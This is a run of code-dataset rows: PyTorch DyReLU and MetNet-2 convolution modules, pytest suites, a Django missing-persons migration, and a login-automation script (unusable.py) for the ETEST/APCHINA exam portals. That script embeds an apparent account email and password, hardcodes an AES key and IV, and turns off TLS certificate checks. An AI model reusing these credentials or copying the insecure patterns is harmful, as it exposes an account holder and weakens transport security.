] | null | null | null | import torch
import torch.nn as nn
class DyReLUA(nn.Module):
def __init__(self,
channels,
reduction=4,
k=2):
super().__init__()
self.channels = channels
self.reduction = reduction
self.k = k
self.coef = nn.Sequential(
nn.AdaptiveAvgPool2d(1),
nn.Conv2d(channels, channels // reduction, 1),
nn.ReLU(),
nn.Conv2d(channels // reduction, 2 * k, 1),
nn.Sigmoid()
)
# default parameter setting
# lambdaA = 1.0, lambdaB = 0.5;
# alphaA1 = 1, alphaA2=alphaB1=alphaB2=0
self.register_buffer('lambdas', torch.Tensor([1.] * k + [0.5] * k).float())
self.register_buffer('bias', torch.Tensor([1.] + [0.] * (2 * k - 1)).float())
def forward(self, x):
coef = self.coef(x)
coef = 2 * coef - 1
coef = coef.view(-1, 2 * self.k) * self.lambdas + self.bias
# activations
# NCHW --> NCHW1
x_perm = x.permute(1, 2, 3, 0).unsqueeze(-1)
# HWNC1 * NK --> HWCNK
output = x_perm * coef[:, :self.k] + coef[:, self.k:]
result = torch.max(output, dim=-1)[0].permute(3, 0, 1, 2)
return result
class DyReLUB(nn.Module):
def __init__(self,
channels,
reduction=4,
k=2):
super().__init__()
self.channels = channels
self.reduction = reduction
self.k = k
self.coef = nn.Sequential(
nn.AdaptiveAvgPool2d(1),
nn.Conv2d(channels, channels//reduction, 1),
nn.ReLU(),
nn.Conv2d(channels//reduction, 2 * k * channels, 1),
nn.Sigmoid()
)
# default parameter setting
# lambdaA = 1.0, lambdaB = 0.5;
# alphaA1 = 1, alphaA2=alphaB1=alphaB2=0
self.register_buffer('lambdas', torch.Tensor([1.]*k + [0.5]*k).float())
self.register_buffer('bias', torch.Tensor([1.] + [0.]*(2*k - 1)).float())
def forward(self, x):
coef = self.coef(x)
coef = 2 * coef - 1
# coefficient update
coef = coef.view(-1, self.channels, 2 * self.k) * self.lambdas + self.bias
# activations
# NCHW --> HWNC1
x_perm = x.permute(2, 3, 0, 1).unsqueeze(-1)
# HWNC1 * NCK --> HWNCK
output = x_perm * coef[:, :, :self.k] + coef[:, :, self.k:]
# maxout and HWNC --> NCHW
result = torch.max(output, dim=-1)[0].permute(2, 3, 0, 1)
return result
class DyReLUC(nn.Module):
def __init__(self,
channels,
reduction=4,
k=2,
tau=10,
gamma=1/3):
super().__init__()
self.channels = channels
self.reduction = reduction
self.k = k
self.tau = tau
self.gamma = gamma
self.coef = nn.Sequential(
nn.AdaptiveAvgPool2d(1),
nn.Conv2d(channels, channels // reduction, 1),
nn.ReLU(),
nn.Conv2d(channels // reduction, 2 * k * channels, 1),
nn.Sigmoid()
)
self.sptial = nn.Conv2d(channels, 1, 1)
# default parameter setting
# lambdaA = 1.0, lambdaB = 0.5;
# alphaA1 = 1, alphaA2=alphaB1=alphaB2=0
self.register_buffer('lambdas', torch.Tensor([1.] * k + [0.5] * k).float())
self.register_buffer('bias', torch.Tensor([1.] + [0.] * (2 * k - 1)).float())
def forward(self, x):
N, C, H, W = x.size()
coef = self.coef(x)
coef = 2 * coef - 1
# coefficient update
coef = coef.view(-1, self.channels, 2 * self.k) * self.lambdas + self.bias
# spatial
gamma = self.gamma * H * W
spatial = self.sptial(x)
spatial = spatial.view(N, self.channels, -1) / self.tau
spatial = torch.softmax(spatial, dim=-1) * gamma
spatial = torch.clamp(spatial, 0, 1).view(N, 1, H, W)
# activations
# NCHW --> HWNC1
x_perm = x.permute(2, 3, 0, 1).unsqueeze(-1)
# HWNC1 * NCK --> HWNCK
output = x_perm * coef[:, :, :self.k] + coef[:, :, self.k:]
# permute spatial from NCHW to HWNC1
spatial = spatial.permute(2, 3, 0, 1).unsqueeze(-1)
output = spatial * output
# maxout and HWNC --> NCHW
result = torch.max(output, dim=-1)[0].permute(2, 3, 0, 1)
return result | 32.627737 | 85 | 0.50783 | 548 | 4,470 | 4.076642 | 0.14781 | 0.026858 | 0.050134 | 0.022381 | 0.813339 | 0.813339 | 0.813339 | 0.803939 | 0.789615 | 0.758729 | 0 | 0.050034 | 0.342729 | 4,470 | 137 | 86 | 32.627737 | 0.710347 | 0.125503 | 0 | 0.709677 | 0 | 0 | 0.008494 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.064516 | false | 0 | 0.021505 | 0 | 0.150538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7ece2d51c125ae2b775ca0483d7ec3c08083ffae | 3,735 | py | Python | tests/test_source.py | xjiro/python-valve | d092690ffda9999ded3aa6739d26feaefbabb996 | [
"MIT"
] | 136 | 2017-09-21T13:12:05.000Z | 2022-03-17T21:02:01.000Z | tests/test_source.py | fizek/python-valve | 963086a385b771a9d58a757814a5cea8111c1c8b | [
"MIT"
] | 47 | 2017-09-17T11:03:03.000Z | 2022-02-26T15:26:51.000Z | tests/test_source.py | fizek/python-valve | 963086a385b771a9d58a757814a5cea8111c1c8b | [
"MIT"
] | 62 | 2017-10-01T20:13:03.000Z | 2022-02-09T21:44:18.000Z | # -*- coding: utf-8 -*-
# Copyright (C) 2017 Oliver Ainsworth
from __future__ import (absolute_import,
unicode_literals, print_function, division)
import socket
import pytest
import valve.source
class TestBaseQuerier:
def test(self):
querier = valve.source.BaseQuerier(('192.0.2.0', 27015))
assert querier.host == '192.0.2.0'
assert querier.port == 27015
assert querier._socket.family == socket.AF_INET
assert querier._socket.type == socket.SOCK_DGRAM
querier.close()
assert querier._socket is None
def test_close(self):
querier = valve.source.BaseQuerier(('192.0.2.0', 27015))
assert querier._socket.family == socket.AF_INET
assert querier._socket.type == socket.SOCK_DGRAM
querier.close()
assert querier._socket is None
with pytest.raises(valve.source.QuerierClosedError):
querier.request()
with pytest.raises(valve.source.QuerierClosedError):
querier.get_response()
def test_close_redundant(self):
querier = valve.source.BaseQuerier(('192.0.2.0', 27015))
assert querier._socket.family == socket.AF_INET
assert querier._socket.type == socket.SOCK_DGRAM
querier.close()
assert querier._socket is None
with pytest.raises(valve.source.QuerierClosedError):
querier.request()
with pytest.raises(valve.source.QuerierClosedError):
querier.get_response()
querier.close()
assert querier._socket is None
with pytest.raises(valve.source.QuerierClosedError):
querier.request()
with pytest.raises(valve.source.QuerierClosedError):
querier.get_response()
def test_context_manager(self):
with valve.source.BaseQuerier(('192.0.2.0', 27015)) as querier:
assert querier._socket.family == socket.AF_INET
assert querier._socket.type == socket.SOCK_DGRAM
assert querier._socket is None
with pytest.raises(valve.source.QuerierClosedError):
querier.request()
with pytest.raises(valve.source.QuerierClosedError):
querier.get_response()
def test_context_manager_close_before_exit(self):
with valve.source.BaseQuerier(('192.0.2.0', 27015)) as querier:
assert querier._socket.family == socket.AF_INET
assert querier._socket.type == socket.SOCK_DGRAM
with pytest.warns(UserWarning):
querier.close()
assert querier._socket is None
with pytest.raises(valve.source.QuerierClosedError):
querier.request()
with pytest.raises(valve.source.QuerierClosedError):
querier.get_response()
assert querier._socket is None
with pytest.raises(valve.source.QuerierClosedError):
querier.request()
with pytest.raises(valve.source.QuerierClosedError):
querier.get_response()
def test_context_manager_close_after_exit(self):
with valve.source.BaseQuerier(('192.0.2.0', 27015)) as querier:
assert querier._socket.family == socket.AF_INET
assert querier._socket.type == socket.SOCK_DGRAM
assert querier._socket is None
with pytest.raises(valve.source.QuerierClosedError):
querier.request()
with pytest.raises(valve.source.QuerierClosedError):
querier.get_response()
querier.close()
assert querier._socket is None
with pytest.raises(valve.source.QuerierClosedError):
querier.request()
with pytest.raises(valve.source.QuerierClosedError):
querier.get_response()
| 39.315789 | 71 | 0.652477 | 412 | 3,735 | 5.762136 | 0.143204 | 0.106571 | 0.168071 | 0.141533 | 0.889217 | 0.889217 | 0.889217 | 0.889217 | 0.889217 | 0.889217 | 0 | 0.029307 | 0.25087 | 3,735 | 94 | 72 | 39.734043 | 0.819157 | 0.015261 | 0 | 0.8125 | 0 | 0 | 0.017143 | 0 | 0 | 0 | 0 | 0 | 0.2875 | 1 | 0.075 | false | 0 | 0.05 | 0 | 0.1375 | 0.0125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7d43866b3923b809cc6597da947c5cf3c633e5b0 | 13,072 | py | Python | blog/migrations/0001_initial.py | Chutithep88/findingpersonsystem | 9385c60bb59b37c42a18c976be9984b94840b2be | [
"bzip2-1.0.6"
] | null | null | null | blog/migrations/0001_initial.py | Chutithep88/findingpersonsystem | 9385c60bb59b37c42a18c976be9984b94840b2be | [
"bzip2-1.0.6"
] | 9 | 2021-03-19T02:38:15.000Z | 2022-01-13T02:38:15.000Z | blog/migrations/0001_initial.py | Chutithep88/findingpersonsystem | 9385c60bb59b37c42a18c976be9984b94840b2be | [
"bzip2-1.0.6"
] | null | null | null | # Generated by Django 2.1 on 2020-04-02 16:32
import cloudinary.models
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='AgePeople',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20)),
],
),
migrations.CreateModel(
name='allemail',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('position', models.CharField(default='', max_length=200)),
('mail', models.CharField(default='', max_length=200)),
('organization', models.CharField(default='', max_length=200)),
('places', models.CharField(default='', max_length=200)),
],
),
migrations.CreateModel(
name='Gender',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20)),
],
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('realname', models.CharField(default='', max_length=150, verbose_name="<font color='red'>ชื่อจริงและนามสกุล</font>")),
('nickname', models.CharField(default='', max_length=50, verbose_name="<font color='red'>ชื่อเล่น</font>")),
('realnameEng', models.CharField(blank=True, max_length=150, null=True, verbose_name='ชื่ออังกฤษ')),
('age', models.PositiveIntegerField(blank=True, help_text='กรอกอายุ 1- 100 (จำเป็นต้องกรอก)', null=True, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(100)], verbose_name="<font color='red'>อายุ(ปี)</font>")),
('nationality', models.CharField(default='', max_length=10, verbose_name="<font color='red'>เชื้อชาติ</font>")),
('lostday', models.CharField(blank=True, help_text='กรอกวันที่ เช่น 21/01/2530', max_length=10, null=True, verbose_name='วันที่หาย')),
('lostTime', models.CharField(blank=True, help_text='กรอกเวลา เช่น 12.00 , 19.30', max_length=5, null=True, verbose_name='เวลาที่หาย')),
('lostWhere', models.CharField(blank=True, max_length=100, null=True, verbose_name='สถานที่หาย')),
('lostReason', models.CharField(blank=True, max_length=200, null=True, verbose_name='เหตุผลที่หาย')),
('identities', models.CharField(default='', help_text='ลักษณะพิเศษ เช่น มีไฝบนหน้า ใส่สร้องทอง ผิวคล้ำเป็นต้น', max_length=100, verbose_name="<font color='red'>ลักษณะพิเศษ</font>")),
('image', cloudinary.models.CloudinaryField(blank=True, max_length=255, null=True, verbose_name='รูปภาพ')),
('content', models.TextField(blank=True, help_text='กรอกรายละเอียดเพิ่มเติม', null=True, verbose_name='รายละเอียดเพิ่มเติม')),
('date_posted', models.DateTimeField(default=django.utils.timezone.now)),
('gender', models.CharField(default='', max_length=5, verbose_name="<font color='red'>เพศ</font>")),
('telephone', models.CharField(default='', max_length=10, verbose_name="<font color='red'>เบอร์โทรติดต่อกับผู้บันทึกข้อมูล</font>")),
('email', models.CharField(default='', max_length=100, verbose_name="<font color='red'>อีเมล์ของผู้บันทึกข้อมูล</font>")),
('author', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Postfound',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('realname', models.CharField(default='', max_length=150, verbose_name="<font color='red'>ชื่อจริงและนามสกุล</font>")),
('nickname', models.CharField(default='', max_length=50, verbose_name="<font color='red'>ชื่อเล่น</font>")),
('realnameEng', models.CharField(blank=True, max_length=150, null=True, verbose_name='ชื่ออังกฤษ')),
('age', models.PositiveIntegerField(blank=True, help_text='กรอกอายุ 1- 100', null=True, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(100)], verbose_name="<font color='red'>อายุ(ปี)</font>")),
('nationality', models.CharField(default='', max_length=10, verbose_name="<font color='red'>เชื้อชาติ</font>")),
('lostday', models.CharField(blank=True, help_text='กรอกวันที่ เช่น 21/01/2530', max_length=10, null=True, verbose_name='วันที่หาย')),
('lostTime', models.CharField(blank=True, help_text='กรอกเวลา เช่น 12.00 , 19.30', max_length=5, null=True, verbose_name='เวลาที่หาย')),
('lostWhere', models.CharField(blank=True, max_length=100, null=True, verbose_name='สถานที่หาย')),
('lostReason', models.CharField(blank=True, max_length=200, null=True, verbose_name='เหตุผลที่หาย')),
('identities', models.CharField(default='', help_text='ลักษณะพิเศษ เช่น มีไฝบนหน้า ใส่สร้องทอง ผิวคล้ำเป็นต้น', max_length=100, verbose_name="<font color='red'>ลักษณะพิเศษ</font>")),
('image', cloudinary.models.CloudinaryField(blank=True, max_length=255, null=True, verbose_name='รูปภาพ')),
('content', models.TextField(blank=True, help_text='กรอกรายละเอียดเพิ่มเติม', null=True, verbose_name='รายละเอียดเพิ่มเติม')),
('date_posted', models.DateTimeField(default=django.utils.timezone.now)),
('gender', models.CharField(default='', max_length=5, verbose_name="<font color='red'>เพศ</font>")),
('telephone', models.CharField(default='', max_length=10, verbose_name="<font color='red'>เบอร์โทรติดต่อกับผู้บันทึกข้อมูล</font>")),
('email', models.CharField(default='', max_length=100, verbose_name="<font color='red'>อีเมล์ของผู้บันทึกข้อมูล</font>")),
('author', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='PostFree',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(default='', help_text='กรอกข้อมูลเช่น พบเจอเด็กหลง , พบเจอคนแก่อยู่ที่ถนน... เป็นต้น', max_length=100, verbose_name="<font color='red'>หัวข้อ</font>")),
('image', cloudinary.models.CloudinaryField(blank=True, max_length=255, null=True, verbose_name='รูปภาพ (สำหรับใส่รูปภาพแกติทั่วไป เช่น รูปเด็กหลงทาง รูปคนแก่หาย เป็นต้น)')),
('image2', cloudinary.models.CloudinaryField(blank=True, max_length=255, null=True, verbose_name='รูปภาพ2 (สำหรับใส่รูปภาพที่รุนแรง ไม่ต้องการเผยรูปนี้ในหน้าโชว์ข้อมูล เช่น รูปเสียชีวิตเป็นต้น)')),
('where', models.CharField(default='', help_text='กรอกข้อมูลเช่น พบเจอที่ราชดำเนิน เป็นต้น', max_length=100, verbose_name="<font color='red'>สถานที่พบเจอ</font>")),
('content', models.TextField(blank=True, help_text='กรุณากรอกข้อความให้ครบถ้วนเพื่อสิทธิประโยชน์ของท่านและสำหรับผู้แจ้งเบาะแส', null=True, verbose_name='รายละเอียดเพิ่มเติม')),
('identities', models.CharField(default='', help_text='ลักษณะพิเศษ เช่น มีไฝบนหน้า ใส่สร้อยทอง ผิวคล้ำเป็นต้น', max_length=100, verbose_name="<font color='red'>ลักษณะพิเศษ</font>")),
('email', models.CharField(blank=True, help_text='ส่วนของข้อมูลส่วนบุคคล กรอกอีเมล์สำหรับให้ญาติของผู้สูญหายสามารถติดต่อกลับได้', max_length=100, null=True, verbose_name='อีเมล์')),
('telephone', models.PositiveIntegerField(blank=True, help_text='ส่วนของข้อมูลส่วนบุคคล กรอกเบอร์โทรศัพท์สำหรับให้ญาติของผู้สูญหายสามารถติดต่อกลับได้', null=True, verbose_name='เบอร์โทรศัพท์ เช่น 0991234567')),
('date_posted', models.DateTimeField(default=django.utils.timezone.now)),
('age', models.ManyToManyField(to='blog.AgePeople', verbose_name="<font color='red'>อายุ</font>")),
('gender', models.ManyToManyField(to='blog.Gender', verbose_name="<font color='red'>เพศ</font>")),
],
),
migrations.CreateModel(
name='Postmail',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('realname', models.CharField(default='', max_length=150, verbose_name="<font color='red'>ชื่อจริงและนามสกุล</font>")),
('nickname', models.CharField(default='', max_length=50, verbose_name="<font color='red'>ชื่อเล่น</font>")),
('realnameEng', models.CharField(blank=True, max_length=150, null=True, verbose_name='ชื่ออังกฤษ')),
('age', models.PositiveIntegerField(blank=True, help_text='กรอกอายุ 1- 100', null=True, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(100)], verbose_name="<font color='red'>อายุ(ปี)</font>")),
('nationality', models.CharField(default='', max_length=10, verbose_name="<font color='red'>เชื้อชาติ</font>")),
('lostday', models.CharField(blank=True, help_text='กรอกวันที่ เช่น 21/01/2530', max_length=10, null=True, verbose_name='วันที่หาย')),
('lostTime', models.CharField(blank=True, help_text='กรอกเวลา เช่น 12.00 , 19.30', max_length=5, null=True, verbose_name='เวลาที่หาย')),
('lostWhere', models.CharField(blank=True, max_length=100, null=True, verbose_name='สถานที่หาย')),
('lostReason', models.CharField(blank=True, max_length=200, null=True, verbose_name='เหตุผลที่หาย')),
('identities', models.CharField(default='', help_text='ลักษณะพิเศษ เช่น มีไฝบนหน้า ใส่สร้อยทอง ผิวคล้ำเป็นต้น', max_length=100, verbose_name="<font color='red'>ลักษณะพิเศษ</font>")),
('image', cloudinary.models.CloudinaryField(blank=True, max_length=255, null=True, verbose_name='รูปภาพ')),
('content', models.TextField(blank=True, help_text='กรอกรายละเอียดเพิ่มเติม', null=True, verbose_name='รายละเอียดเพิ่มเติม')),
('date_posted', models.DateTimeField(default=django.utils.timezone.now)),
('fromEmail', models.CharField(default='', max_length=150)),
('gender', models.CharField(default='', max_length=5, verbose_name="<font color='red'>เพศ</font>")),
('author', models.ForeignKey(default='', on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='PostRisk',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('realname', models.CharField(default='', max_length=150, verbose_name="<font color='red'>ชื่อจริงและนามสกุล</font>")),
('nickname', models.CharField(default='', max_length=50, verbose_name="<font color='red'>ชื่อเล่น</font>")),
('realnameEng', models.CharField(blank=True, max_length=150, null=True, verbose_name='ชื่ออังกฤษ')),
('age', models.PositiveIntegerField(blank=True, null=True, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(100)], verbose_name="<font color='red'>อายุ</font>")),
('nationality', models.CharField(default='', max_length=10, verbose_name="<font color='red'>เชื้อชาติ</font>")),
('identities', models.CharField(default='', help_text='ลักษณะพิเศษ เช่น มีไฝบนหน้า ใส่สร้อยทอง ผิวคล้ำเป็นต้น', max_length=100, verbose_name="<font color='red'>ลักษณะพิเศษ</font>")),
('image', cloudinary.models.CloudinaryField(blank=True, max_length=255, null=True, verbose_name='รูปภาพ')),
('content', models.TextField(blank=True, help_text='กรอกรายละเอียดเพิ่มเติม', null=True, verbose_name='รายละเอียดเพิ่มเติม')),
('date_posted', models.DateTimeField(default=django.utils.timezone.now)),
('gender', models.CharField(default='', max_length=5, verbose_name="<font color='red'>เพศ</font>")),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
# File: metnet/layers/DilatedCondConv.py (repo: ValterFallenius/metnet, license: MIT)
"""Dilated Time Conditioned Residual Convolution Block for MetNet-2"""
import torch
import torch.nn as nn
import torch.nn.functional as F
from metnet.layers.LeadTimeConditioner import LeadTimeConditioner
class DilatedResidualConv(nn.Module):
def __init__(
self,
input_channels: int,
output_channels: int = 384,
dilation: int = 1,
kernel_size: int = 3,
activation: nn.Module = nn.ReLU(),
):
super().__init__()
self.dilated_conv_one = nn.Conv2d(
in_channels=input_channels,
out_channels=output_channels,
dilation=(dilation, dilation),
kernel_size=(kernel_size, kernel_size),
padding="same",
)
# Target Time index conditioning
self.lead_time_conditioner = LeadTimeConditioner()
self.activation = activation
self.dilated_conv_two = nn.Conv2d(
in_channels=output_channels,
out_channels=output_channels,
dilation=(dilation, dilation),
kernel_size=(kernel_size, kernel_size),
padding="same",
)
# To make sure number of channels match, might need a 1x1 conv
if input_channels != output_channels:
self.channel_changer = nn.Conv2d(
in_channels=input_channels, out_channels=output_channels, kernel_size=(1, 1)
)
else:
self.channel_changer = nn.Identity()
def forward(self, x: torch.Tensor, beta, gamma) -> torch.Tensor:
out = self.dilated_conv_one(x)
out = F.layer_norm(out, out.size()[1:])
out = self.lead_time_conditioner(out, beta, gamma)
out = self.activation(out)
out = self.dilated_conv_two(out)
out = F.layer_norm(out, out.size()[1:])
out = self.lead_time_conditioner(out, beta, gamma)
out = self.activation(out)
x = self.channel_changer(x)
return x + out
class UpsampleResidualConv(nn.Module):
def __init__(
self,
input_channels: int,
output_channels: int = 512,
dilation: int = 1,
kernel_size: int = 3,
activation: nn.Module = nn.ReLU(),
):
super().__init__()
self.dilated_conv_one = nn.ConvTranspose2d(
in_channels=input_channels,
out_channels=output_channels,
stride=2,
kernel_size=kernel_size,
)
# Target Time index conditioning
self.lead_time_conditioner = LeadTimeConditioner()
self.activation = activation
self.dilated_conv_two = nn.ConvTranspose2d(
in_channels=output_channels,
out_channels=output_channels,
stride=2,
kernel_size=kernel_size,
)
if input_channels != output_channels:
self.channel_changer = nn.Conv2d(
in_channels=input_channels, out_channels=output_channels, kernel_size=(1, 1)
)
else:
self.channel_changer = nn.Identity()
def forward(self, x: torch.Tensor, beta, gamma) -> torch.Tensor:
out = self.dilated_conv_one(x)
out = F.layer_norm(out, out.size()[1:])
out = self.lead_time_conditioner(out, beta, gamma)
out = self.activation(out)
out = self.dilated_conv_two(out)
out = F.layer_norm(out, out.size()[1:])
out = self.lead_time_conditioner(out, beta, gamma)
out = self.activation(out)
x = self.channel_changer(x)
return x + out
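Both blocks above implement the same residual pattern: run the input through the main branch, project the input with a 1x1 convolution only when channel counts differ, and add the two. A dependency-free sketch of that skip-connection logic, with plain Python lists standing in for tensors (illustrative only, not part of MetNet-2):

```python
def residual_apply(x, transform, project=None):
    """Mimic `x = self.channel_changer(x); return x + out` from the blocks above."""
    out = [transform(v) for v in x]                    # main branch
    skip = [project(v) for v in x] if project else x   # optional 1x1-style projection
    return [s + o for s, o in zip(skip, out)]

print(residual_apply([1.0, 2.0], lambda v: v * 0.5))  # [1.5, 3.0]
```

When `project` is omitted the input passes through unchanged, matching the `nn.Identity()` branch of `channel_changer`.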
# File: unusable.py (repo: A2ner/ap, license: MIT)
# _*_ coding: utf-8 _*_
import re
import base64
import requests
from PIL import Image
from bs4 import BeautifulSoup
from Crypto.Cipher import AES
headers = {
'Host': 'apchina.net.cn',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded'
}
# Encrypt the password (AES-CBC, then base64)
def passwd_encode(raw_pass):
key = 'As2Ssgk0AMikkiMA'
IV = 'Bt4GtgCAb5k99k5b'
mode = AES.MODE_CBC
pad = 16 - len(raw_pass) % 16
raw_pass = raw_pass + pad * chr(pad)  # PKCS#7-style padding to a 16-byte boundary
encryptor = AES.new(key, mode, IV)
encrypt_text = encryptor.encrypt(raw_pass)
encrypt_text = base64.b64encode(encrypt_text)
return encrypt_text
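The padding step in `passwd_encode` above is PKCS#7-style: it appends `pad` copies of `chr(pad)` so the plaintext length becomes a multiple of the 16-byte AES block size. A stdlib-only sketch of just that step (the cipher itself still needs the `Crypto`/pycryptodome dependency):

```python
def pkcs7_pad(raw: str, block: int = 16) -> str:
    # Always pads: an already-aligned input gains a full extra block.
    pad = block - len(raw) % block
    return raw + pad * chr(pad)

padded = pkcs7_pad('123456test!')    # 11 chars -> pad = 5
print(len(padded), ord(padded[-1]))  # 16 5
```

Because the pad byte encodes its own length, decryption can strip it by reading the last byte.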
req_with_session = requests.session()
login_session = requests.session()
# username = input('Enter your ETEST ID: ')
# passwd = input('Enter your ETEST ID password: ')
username = '1548983578@qq.com'
passwd = '123456test!'
class login:
def get_captcha(self):
captcha_url = "https://passport.etest.net.cn/CheckImage/LoadCheckImage"
image_url = re.findall('[a-zA-z]+://[^\s]*[$jpg]', req_with_session.post(captcha_url, verify=False).content)[0]
image_data = req_with_session.get(image_url, verify=False)
if not image_data:
return False
f = open('valcode.jpg', 'wb')
f.write(image_data.content)
f.close()
im = Image.open('valcode.jpg')
im.show()
captcha = input('Enter the captcha required for this login: ')
return captcha
def ETEST_login(self):
request = req_with_session.get('https://passport.etest.net.cn/', verify=False)
raw_token = re.findall('<input name="__RequestVerificationToken".*/>', request.content)
token = raw_token[0].replace('<input name="__RequestVerificationToken" type="hidden" value="', '').replace(
'" />', "")
login_url = 'https://passport.etest.net.cn/'
data = {
'__RequestVerificationToken': token,
'txtUserName': username,
'txtPassword': passwd_encode(passwd),
'txtCheckImageValue': self.get_captcha(),
'hdnLoginMode': '',
'hdnReturnUrl': '',
'hdnRedirectUrl': '',
'HiddenAccessToken': '',
'HiddenPublicKeyExponent': 'As2Ssgk0AMikkiMA',
'HiddenPublicKeyModulus': 'Bt4GtgCAb5k99k5b',
'HiddenThirdCode': '',
'HiddenThirdName': '',
'HiddenSafe': ''
}
result = req_with_session.post(login_url, data=data, headers=headers, verify=False)
if '通行证ID' in result.content:
print('ETEST login succeeded, redirecting to APCHINA...')
else:
print(result.content)
result = req_with_session.get(
'https://passport.etest.net.cn/Manage/Jump?returnUrl=http://apchina.net.cn/Home/VerifyPassport/?LoginType=0&redirectUrl=&loginMode=0&safe=1',
verify=False)
soup = BeautifulSoup(result.content, "html.parser")
for name in soup.find_all('input'):
key = name.get('name')
value = name.get('value')
data[key] = value
print(data)
return data
def APCHINA_login(self):
data = self.ETEST_login()
result = login_session.post('http://apchina.net.cn/Home/VerifyPassport/?LoginType=0', data=data)
if "允许报名生日" in result.content:
print('login success!')
else:
print(result.content)
raw_sid = re.findall('\'[0-9a-zA-Z]{32}\'', result.content)
sid = raw_sid[0].replace("'", "")
user = login()
user.APCHINA_login()
# File: tests/test_ignis.py (repo: insertdead/ignis, license: Apache-2.0)
from ignis import __version__
from ignis.entities import common
def test_version():
assert __version__ == "0.1.0"
# File: regym/util/__init__.py (repo: KnwSondess/Regym, license: MIT)
from .play_matches import play_single_match, play_multiple_matches
from .play_matches import extract_winner
from .utils import save_traj_with_graph
from .wrappers import *
# File: tests/test_exceptions.py (repo: PythonCoderAS/AsyncDex, license: MIT)
import re
from datetime import datetime
import pytest
from aiohttp import ClientResponseError
from asyncdex import AsyncDexException, HTTPException, MangadexClient, Ratelimit
from asyncdex.constants import routes
class TestAsyncDexException:
def test_subclass(self):
assert issubclass(AsyncDexException, Exception)
exc = AsyncDexException()
assert isinstance(exc, Exception)
with pytest.raises(AsyncDexException):
raise exc
with pytest.raises(Exception):
raise exc
def test_message(self):
with pytest.raises(AsyncDexException) as exc:
raise AsyncDexException("test")
assert str(exc.value) == "test"
class TestRatelimit:
def test_subclass(self):
assert issubclass(Ratelimit, AsyncDexException)
exc = Ratelimit("a", 1, datetime.utcnow())
assert isinstance(exc, AsyncDexException)
with pytest.raises(Ratelimit):
raise exc
with pytest.raises(AsyncDexException):
raise exc
def test_message(self):
with pytest.raises(Ratelimit) as exc:
raise Ratelimit("/test", 1, datetime.fromtimestamp(int(datetime.utcnow().timestamp()) + 100))
assert re.match(r"Ratelimited for 99.\d{3} seconds on /test", str(exc.value))
def test_attrs(self):
now = datetime.utcnow()
exc = Ratelimit("a", 1, now)
assert exc.path == "a"
assert exc.ratelimit_amount == 1
assert exc.ratelimit_expires == now
class TestHTTPException:
def test_subclass(self):
assert issubclass(HTTPException, AsyncDexException)
assert issubclass(HTTPException, ClientResponseError)
exc = HTTPException("a", "a", None)
assert isinstance(exc, AsyncDexException)
assert isinstance(exc, ClientResponseError)
with pytest.raises(HTTPException):
raise exc
with pytest.raises(AsyncDexException):
raise exc
with pytest.raises(ClientResponseError):
raise exc
def test_message_no_response(self):
with pytest.raises(HTTPException) as exc:
raise HTTPException("GET", "/test", None)
assert str(exc.value) == "HTTP Error on GET for /test."
@pytest.mark.asyncio
@pytest.mark.vcr()
async def test_message_response(self):
async with MangadexClient() as client:
with pytest.raises(HTTPException) as exc:
await client.request("GET", "/fakepath" * 1000)
assert (
str(exc.value)
== "HTTP 414: HTTP Error on GET for https://api.mangadex.org" + "/fakepath" * 1000 + "."
)
@pytest.mark.asyncio
@pytest.mark.vcr()
async def test_message_response_json(self):
async with MangadexClient() as client:
r = await client.request("get", routes["ping"])
with pytest.raises(HTTPException) as exc:
raise HTTPException(
"GET", routes["ping"], response=r, json={"errors": [{"title": "Test", "detail": "This is a test."}]}
)
assert str(exc.value) == "HTTP 200: Test: This is a test."
def test_message_no_response_json(self):
with pytest.raises(HTTPException) as exc:
raise HTTPException(
